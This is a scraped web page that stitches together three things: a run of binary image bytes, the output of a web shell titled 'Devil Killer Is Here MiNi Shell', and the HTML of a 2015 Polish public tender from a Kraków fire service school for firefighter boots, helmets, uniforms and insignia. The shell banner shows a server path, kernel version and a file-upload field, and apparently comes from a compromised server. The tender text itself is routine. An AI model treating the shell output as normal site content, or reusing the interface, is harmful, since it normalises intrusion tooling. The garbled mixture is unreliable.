JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150520/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150520/72925-N-2015.html

<p class="kh_header"><b>Kraków: Dostawa odzieży specjalnej, środków ochrony indywidualnej oraz ekwipunku osobistego strażaka dla Szkoły Aspirantów Państwowej Straży Pożarnej</b><br>
<b>Numer ogłoszenia: 72925 - 2015; data zamieszczenia: 20.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Aspirantów Państwowej Straży Pożarnej , os. Zgody 18, 31-951 Kraków, woj. małopolskie, tel. 012 6460303, 6460100, faks 012 6460199.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sapsp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Straż Pożarna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odzieży specjalnej, środków ochrony indywidualnej oraz ekwipunku osobistego strażaka dla Szkoły Aspirantów Państwowej Straży Pożarnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa odzieży specjalnej, środków ochrony indywidualnej oraz ekwipunku osobistego strażaka dla Szkoły Aspirantów Państwowej Straży Pożarnej.
1. Postępowanie podzielone jest na dziesięć części:
CZĘŚĆ 1
Dostawa butów strażackich skórzanych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Buty strażackie skórzane 100 par /zamówienie podstawowe/
- Buty strażackie skórzane 30 par /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.1.
CZĘŚĆ 2
Dostawa butów strażackich gumowych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Buty strażackie gumowe 30 par /zamówienie podstawowe/
- Buty strażackie gumowe 5 pary /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.2.
CZĘŚĆ 3
Dostawa obuwia koszarowego oraz butów dla kadry dowódczo sztabowej dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Obuwie koszarowe 100 par /zamówienie podstawowe/
- Buty dla kadry dowódczo sztabowej 10 par /zamówienie podstawowe/
- Obuwie koszarowe 20 par /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.3.
CZĘŚĆ 4
Dostawa ubrań specjalnych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Ubranie specjalne 95 kpl. /zamówienie podstawowe/
- Ubranie specjalne 20 kpl. /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołączy do siwz jako załącznik 1.4.
CZĘŚĆ 5
Dostawa ubrań koszarowych oraz ubrań roboczych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Ubranie koszarowe (bluza + spodnie) 130 kpl. /zamówienie podstawowe/
- Ubranie koszarowe (czapka) 150 szt. /zamówienie podstawowe/
- Ubranie robocze (bluza + spodnie) 6 kpl. /zamówienie podstawowe/
- Ubranie koszarowe (bluza + spodnie) 50 kpl. /zamówienie w ramach prawa opcji/
- Ubranie koszarowe (czapka) 50 szt. /zamówienie w ramach prawa opcji/
- Ubranie robocze (bluza + spodnie) 2 kpl. /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.5.
CZĘŚĆ 6
Dostawa koszulek letnich oraz koszulek zimowych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Koszulka letnia 260 szt. /zamówienie podstawowe/
- Koszulka zimowa 260 szt. /zamówienie podstawowe/
- Koszulka letnia 40 szt. /zamówienie w ramach prawa opcji/
- Koszulka zimowa 40 szt. /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.6.
CZĘŚĆ 7
Dostawa hełmów strażackich dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Hełm strażacki 50 szt. /zamówienie podstawowe/
- Hełm strażacki 10 szt. /zamówienie w ramach prawa opcji/
Okres gwarancji na skorupę min. 120 miesięcy.
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.7.
CZĘŚĆ 8
Dostawa kominiarek niepalnych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Kominiarka niepalna 45 szt. /zamówienie podstawowe/
- Kominiarka niepalna 10 szt. /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.8.
CZĘŚĆ 9
Dostawa pasów bojowych dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Pas bojowy 30 szt. /zamówienie podstawowe/
- Pas bojowy 10 szt. /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.9.
CZĘŚĆ 10
Dostawa dystynkcji i emblematów dla Szkoły Aspirantów Państwowej Straży Pożarnej w Krakowie.
Przedmiot zamówienia:
- Dystynkcje na plakietkach 502 szt. /zamówienie podstawowe/
- Dystynkcje na beret 320 szt. /zamówienie podstawowe/
- Dystynkcje na pochewkach 170 kpl. /zamówienie podstawowe/
- Identyfikator kadry dowódczo - sztabowej 8 szt. /zamówienie podstawowe/
- Emblemat SA PSP w Krakowie 100 szt. /zamówienie podstawowe/
- Dystynkcje na plakietkach 50 szt. /zamówienie w ramach prawa opcji/
- Dystynkcje na beret 10 szt. /zamówienie w ramach prawa opcji/
- Dystynkcje na pochewkach 10 kpl. /zamówienie w ramach prawa opcji/
- Identyfikator kadry dowódczo - sztabowej 2 szt. /zamówienie w ramach prawa opcji/
- Emblemat SA PSP w Krakowie 10 szt. /zamówienie w ramach prawa opcji/
Szczegółowy opis przedmiotu zamówienia zamawiający dołącza do siwz jako załącznik 1.10..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.83.20.00-0, 18.81.50.00-5, 35.81.11.00-3, 18.33.10.00-8, 18.44.41.10-7, 35.81.00.00-5, 35.11.34.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do przetargu wykonawca zobowiązany jest wnieść wadium w wysokości:
- dla zadania nr 1 w wysokości: 800,00 zł. (słownie: osiemset złotych 00 groszy),
- dla zadania nr 2 w wysokości: 200,00 zł. (słownie: dwieście złotych 00 groszy),
- dla zadania nr 3 w wysokości: 300,00 zł. (słownie: trzysta złotych 00 groszy),
- dla zadania nr 4 w wysokości: 3.000,00 zł. (słownie: trzy tysiące złotych 00 groszy),
- dla zadania nr 5 w wysokości: 600,00 zł. (słownie: sześćset złotych 00 groszy),
- dla zadania nr 6 w wysokości: 250,00 zł.(słownie: dwieście pięćdziesiąt złotych 00 groszy),
- dla zadania nr 7 w wysokości: 650,00 zł. (słownie: sześćset pięćdziesiąt złotych 00 groszy),
- zamawiający nie żąda wniesienia wadium dla zadania nr 8, 9 i 10.
2. Wykonawca wnosi wadium w dowolnym czasie jednak nie później niż przed upływem terminu składania ofert określonego w Rozdziale VII pkt. 1 SIWZ.
3. Wadium może być wniesione w jednej lub kilku formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
4. Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowych, gwarancji ubezpieczeniowych lub poręczeniach udzielanych przez podmioty należy złożyć w oryginale w siedzibie zamawiającego - sekretariat Komendanta Szkoły pokój 200, II piętro, bud. A.
5. W przypadku, gdy wadium będzie wniesione w formie poręczenia bankowego, gwarancji bankowych, gwarancji ubezpieczeniowych lub poręczeniach udzielanych przez podmioty, muszą zawierać zapisy gwarantujące wypłatę kwoty wadium na każde pisemne wezwanie zamawiającego w przypadku zaistnienia którejkolwiek z okoliczności wskazanych w art. 46 ust. 4a i 5 ustawy.
6. Wymagany termin ważności poręczenia bankowego, gwarancji bankowych, gwarancji ubezpieczeniowych lub poręczeniach udzielanych przez podmioty wynosi 30 dni, tj. przez okres związania ofertą, o którym mowa w Rozdziale VI pkt. 8 SIWZ.
7. Zamawiający nie dopuszcza innych form wnoszenia wadium. Przy wnoszeniu wadium wykonawca winien powołać się na oznaczenie oferty podanej przez zamawiającego w Rozdziale I pkt. 1 SIWZ.
8. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego tj. NBP o/o Kraków nr 48 1010 1270 0060 0213 9120 0000.
9. Wadium winno wpłynąć na rachunek bankowy wskazany powyżej, nie później niż przed upływem terminu składania ofert.
10. Wykonawca, który nie zabezpieczy oferty jedną ze wskazanych wyżej form zostanie wykluczony.
11. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy.
12. Zamawiający zwróci wadium wykonawcy, którego oferta została wybrana jako najkorzystniejsza niezwłocznie po zawarciu umowy.
13. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofa ofertę przed upływem terminu składania ofert.
14. Zamawiający, zażąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
15. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
- odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
16. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 ustawy, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku, wykonawca zobowiązany jest wykazać wykonanie, co najmniej jednej dostawy o podobnym charakterze w okresie ostatnich trzech lat przed upływem składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie (zgodnie z załącznikiem nr 7) o wartości co najmniej 50% zaoferowanej w ofercie wartości brutto dla danego zadania lub ich równowartość w innej walucie. W przypadku złożenia przez wykonawców dokumentów zawierających dane w innej walucie niż polska (PLN) zamawiający jako kurs przeliczeniowy przyjmie średni kurs NBP z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych (średnie kursy walut dostępne są pod adresem internetowym NBP).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Świadectwo dopuszczenia do użytkowania, wydane na podstawie Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U. z 2007 r. nr 143. poz. 1002 ze zm.) - dla zadania 1, 2, 4, 7, 8 i 9.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. /Jeśli dotyczy/ Pełnomocnictwo, o którym mowa w rozdziale VI pkt. 10.1. SIWZ.
2. /Jeśli dotyczy/ Wystąpienie, o którym mowa w Rozdziale VI pkt. 11 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Okres gwarancji - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość dokonania zmiany istotnych postanowień zawartej umowy, w stosunku do treści oferty, w zakresie:
1) urzędowej zmiany stawki podatku od towarów i usług (VAT), jeżeli zmiana stawki podatku od towarów i usług (VAT) powodować będzie zwiększenie lub zmniejszenie należnego wynagrodzenia wykonawcy z umowy, (kosztów umowy po stronie wykonawcy), zamawiający dopuszcza zwiększenie lub zmniejszenie wynagrodzenia o kwotę równą różnicy w kwocie podatku naliczonego przez wykonawcę;
2) parametrów technicznych przedmiotu zamówienia - w przypadku gdy zmiany te będą korzystniejsze dla zamawiającego;
3) terminu realizacji przedmiotu zamówienia - gdy wystąpi konieczność zmiany terminu w związku z wydłużającym się postępowaniem lub zaistnieją okoliczności mające wpływ na termin realizacji, a których nie dało się przewidzieć w chwili zawarcia umowy;
4) inne niekorzystne dla zamawiającego zmiany umowy dopuszczalne są tylko wówczas, jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie dostaw przez wykonawcę byłoby połączone z nadmiernymi trudnościami albo groziłoby mu rażącą stratą, czego nie przewidywał on przy zawarciu umowy;
5) zmiany umowy polegające na zmianie danych wykonawcy bez zmian samego wykonawcy (np. zmiana siedziby, adresu, nazwy itp.);
6) sytuacji, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tj. nieodnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielania zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona;
2. Zmiana postanowień zawartej umowy wymaga, pod rygorem nieważności, zachowania formy pisemnej, chyba, że przepisy odrębne wymagają formy szczególnej.
3. Zmiany postanowień zawartej umowy określone w pkt. 1 ppkt 1), nie wymagają zachowania formy pisemnej.
4. Zmiana umowy na wniosek wykonawcy wymaga wykazania okoliczności uprawniających do dokonania tej zmiany.
5. Zamawiający zastrzega sobie prawo odstąpienia od umowy w przypadku, gdy zmiany treści umowy wymagałyby zmiany treści oferty złożonej przez wykonawcę.
6. Zmiany umowy, o których mowa powyżej muszą być dokonywane zachowaniem przepisu art. 140 ust. 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 ze zm.) stanowiącego, że umowa jest nieważna w części wykraczającej poza określenie przedmiotu zamówienia zawarte w specyfikacji istotnych warunków zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sapsp.pl<br>
